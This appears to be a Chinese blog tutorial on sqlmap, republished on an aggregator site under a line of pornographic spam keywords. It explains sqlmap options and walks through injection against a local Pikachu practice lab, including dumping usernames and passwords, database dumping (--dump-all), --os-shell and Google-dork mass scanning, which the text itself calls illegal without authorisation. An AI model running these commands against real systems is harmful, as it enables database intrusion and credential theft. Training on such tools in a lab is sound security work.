国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

滲透工具-sqlmap-基本知識及使用教程

這篇具有很好參考價值的文章主要介紹了滲透工具-sqlmap-基本知識及使用教程。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

?

常用命令:

-u指定目標(biāo)URL (可以是http協(xié)議也可以是https協(xié)議)

-d連接數(shù)據(jù)庫

--dbs列出所有的數(shù)據(jù)庫

--current-db列出當(dāng)前數(shù)據(jù)庫

--tables列出當(dāng)前的表

--columns列出當(dāng)前的列

-D選擇使用哪個數(shù)據(jù)庫

-T選擇使用哪個表

-C選擇使用哪個列

--dump獲取字段中的數(shù)據(jù)

--dump-all?拖庫

--batch?自動選擇yes

--smart?啟發(fā)式快速判斷,節(jié)約浪費(fèi)時間

--forms?嘗試使用post注入

-r?加載文件中的HTTP請求(本地保存的請求包txt文件)

-l?加載文件中的HTTP請求(本地保存的請求包日志文件)

-g?自動獲取Google搜索的前一百個結(jié)果,對有GET參數(shù)的URL測試

-o?開啟所有默認(rèn)性能優(yōu)化

-f fingerprint 獲取指紋信息

--tamper??調(diào)用腳本進(jìn)行注入

-v?指定sqlmap的回顯等級

--delay?設(shè)置多久訪問一次

--os-shell??獲取主機(jī)shell,一般不太好用,因為沒權(quán)限

-m?批量操作

-c?指定配置文件,會按照該配置文件執(zhí)行動作

-data???data指定的數(shù)據(jù)會當(dāng)做post數(shù)據(jù)提交

-timeout??設(shè)定超時時間

-level

設(shè)置注入探測等級共有五個等級,默認(rèn)為1級, 這個參數(shù)不僅影響使用哪些payload同時也會影響測試的注入點,GET和POST的數(shù)據(jù)都會測試,HTTP Cookie在level為2的時候就會測試,HTTP User-Agent/Referer頭在level為3的時候就會測試。總之在你不確定哪個payload或者參數(shù)為注入點的時候,為了保證全面性,建議使用高的level值。

--is-dba?判斷當(dāng)前用戶是否為數(shù)據(jù)庫管理員權(quán)限

--risk?風(fēng)險等級

--identify-waf?檢測防火墻類型

--param-del="分割符"??設(shè)置參數(shù)的分割符

--skip-urlencode不進(jìn)行url編碼

--keep-alive設(shè)置持久連接,加快探測速度

--null-connection檢索沒有body響應(yīng)的內(nèi)容,多用于盲注

--thread最大為10 設(shè)置多線程

--delay

有些web服務(wù)器請求訪問太過頻繁可能會被防火墻攔截,使用--delay就可以設(shè)定兩次http請求的延時

--safe-url?有的web服務(wù)器會在多次錯誤的訪問請求后屏蔽所有請求,使用--safe-url 就可以每隔一段時間去訪問一個正常的頁面。

--technique?指定注入類型

B:Boolean-based-blind (布爾型型注入)

E:Error-based (報錯型注入)

U:Union query-based (聯(lián)合注入)

S:Starked queries (通過sqlmap讀取文件系統(tǒng)、操作系統(tǒng)、注冊表必須 使用該參數(shù),可多語句查詢注入)

T:Time-based blind (基于時間延遲注入)

--dump --smart --batch???自動得到所有信息

SQLmap直連數(shù)據(jù)庫

服務(wù)型數(shù)據(jù)庫(提前知道數(shù)據(jù)庫用戶名和密碼):

Eg:python sqlmap.py -d”?mysql://admin:admin@192.18.255.1:3306/testdb”?-f --banner --dbs --users

文件型數(shù)據(jù)庫(提前知道數(shù)據(jù)庫的絕對路徑)

Sqlmap url探測

實例暴力破解

Pikachu ?post 型

數(shù)字型注入

抓個包,在sqlmap中查詢所有數(shù)據(jù)庫 --dbs

sqlmap使用cookie,軟件安全分析,數(shù)據(jù)庫,測試工具,安全,windows

得到結(jié)果如圖所示

sqlmap使用cookie,軟件安全分析,數(shù)據(jù)庫,測試工具,安全,windows

獲取數(shù)據(jù)庫名稱和數(shù)據(jù)庫版本 --current -db

sqlmap使用cookie,軟件安全分析,數(shù)據(jù)庫,測試工具,安全,windows

?sqlmap使用cookie,軟件安全分析,數(shù)據(jù)庫,測試工具,安全,windows

?sqlmap使用cookie,軟件安全分析,數(shù)據(jù)庫,測試工具,安全,windows

獲得pikchu數(shù)據(jù)庫中的表單 ?-D pikachu --tables

sqlmap使用cookie,軟件安全分析,數(shù)據(jù)庫,測試工具,安全,windows

獲取user表中的全部列 -D pikachu -T users -columns

獲取其中的賬號密碼 -D pikachu -T users -C username,password --dump

Pikachu2:get型

Python sqlmap.py -u "http://127.0.0.1:8080/pikachu/vul/sqli/sqli_str.php?name=hello&submit=%E6%9F%A5%E8%AF%A2" (--current-db)?--smart --batch

Sqlmap文件讀取目標(biāo)

-r?加載文件中的HTTP請求(本地保存的請求包txt文件)

-l?加載文件中的HTTP請求(本地保存的請求包日志文件)

-x 從sitemap.xml站點地圖中讀取目標(biāo)探測

-m 從文本文件中讀取HTTP請求作為sql注入探測的目標(biāo)

-c 從配置文件sqlmap.conf中讀取目標(biāo)探測

sqlmap使用cookie,軟件安全分析,數(shù)據(jù)庫,測試工具,安全,windows

抓包,test文檔里有信息,將test粘貼到salmap中

sqlmap使用cookie,軟件安全分析,數(shù)據(jù)庫,測試工具,安全,windows

Sqlmap Google批量掃注入(未授權(quán)違法)

-G:自動利用Google獲取指定Google hack 的目標(biāo),然后利用交互向?qū)J竭M(jìn)行SQL注入探測

Eg:python sqlmap.py -g “inurl:.php?id=1”

三、Sqlmap請求參數(shù)設(shè)置

1、sqlmap設(shè)置HTTP方法

Sqlmap會自動在探測過程中使用適合的HTTP請求方法。但有時候SQLmap不能切換到對應(yīng)的HTTP方法,而導(dǎo)致探測失敗,需要強(qiáng)制的使用具體的HTTP請求方法。

例如put請求方法。HTTP put請求方法不會自動使用,因此我們需要強(qiáng)制指定。使用--method=PUT

2、sqlmap設(shè)置post提交參數(shù)

默認(rèn)情況,執(zhí)行http請求的HTTP方法是GET,但是可以通過加上--data=””改為post,或者使用--method=po's't

Post提交

-u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2"

需要寫--data里面

Get提交

-u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_str.php?name=vince&submit=%E6%9F%A5%E8%AF%A2"?

在url里面

Eg:python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users

-f fingerprint 指紋

3、sqlmap設(shè)置參數(shù)分隔符

某些情況下,sqlmap需要覆蓋默認(rèn)參數(shù)分隔符(例如& in GET和POST數(shù)據(jù)),才能正確地分割和單獨(dú)處理每個參數(shù)。

python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs -- users

參數(shù)拆分字符 ??--param-del ??當(dāng)get或post的數(shù)據(jù)需要用其他字符分割測試參數(shù)的時候需要用到此參數(shù)

4、sqlmap設(shè)置cookie頭

--cookie

--cookie-del

--load-cookies

--drop-set-cookie

使用場景:

1、web應(yīng)用需要登陸的時候。

2、你想要在這些頭參數(shù)中測試SQL注入時。

Sqlmap使用cookie過程:

  1. 登錄或瀏覽也頁面
  2. 打開審計工具或者代理截斷,復(fù)制cookie
  3. 在sqlmap中使用 --cookie 粘貼cookie

cookie其實就是身份識別
此處不加cookie的話可能會進(jìn)行跳轉(zhuǎn)出現(xiàn)302錯誤
因為你使用的是賬號密碼登錄,獲取登陸的cookie
不加cookie直接登錄的話就相當(dāng)于你沒有輸入賬號和密碼
當(dāng)然跳轉(zhuǎn)到另一個頁面了
就不會到登錄成功的頁面

但是會出現(xiàn)一種情況
cookie值不是固定的
也就是你一開始使用cookie注入后
服務(wù)器返回給你一個cookie,這個返回的cookie不同于你一開始設(shè)置的cookie
返回的這個cookie是登陸成功后的cookie
所以我們之前的cookie注入就不能針對成功后的注入
我們現(xiàn)在對成功后的cookie進(jìn)行測試
burp獲取成功后的cookie可能需要點forward文章來源地址http://www.zghlxwxcb.cn/news/detail-759024.html

到了這里,關(guān)于滲透工具-sqlmap-基本知識及使用教程的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包